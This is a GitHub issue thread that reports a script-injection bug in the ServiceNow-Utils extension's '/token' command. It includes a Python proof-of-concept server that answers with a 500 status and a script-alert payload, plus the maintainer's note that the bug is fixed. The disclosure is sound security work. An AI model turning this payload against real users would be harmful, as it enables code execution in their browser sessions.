### ISSUE TITLE
Malicious HTTP server can cause script injection when "token" slashcommand is executed

### ISSUE THREAD

**Issue by EricMedina024** [arnoudkooi/ServiceNow-Utils#109]
When using the slashcommand "token" if a malicious HTTP server is running on localhost:1977, it can respond with a non-200 status code to execute a script in the context of the form iframe. For example, if you run the following Python3 code and then execute "/token", an alert is shown:
```
from http.server import HTTPServer, BaseHTTPRequestHandler


class Server(BaseHTTPRequestHandler):

    def do_POST(self):
        self.send_response(500)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write('<script>alert("This is an alert")</script>'.encode('utf-8'))


def run():
    httpd = HTTPServer(('localhost', 1977), Server)
    httpd.serve_forever()


if __name__ == '__main__':
    run()

```
![image](https://user-images.githubusercontent.com/53099692/116730612-51666200-a9ae-11eb-8b72-28958b2325be.png)

The code causing this is below:
https://github.com/arnoudkooi/ServiceNow-Utils/blob/437f23db3a506fe0978e8fc62dd6215d695c330e/inject.js#L2356-L2359

**Comment by arnoudkooi** [comment]
The reason why Im not processing a response on a 200 is for this. This is now fixed in [this commit](https://github.com/arnoudkooi/ServiceNow-Utils/commit/0863bc2cfcace758e17b9552ea7ff70258c468e4 ) however, if someone is able to run a malicious server on your localhost you probably have other problems...
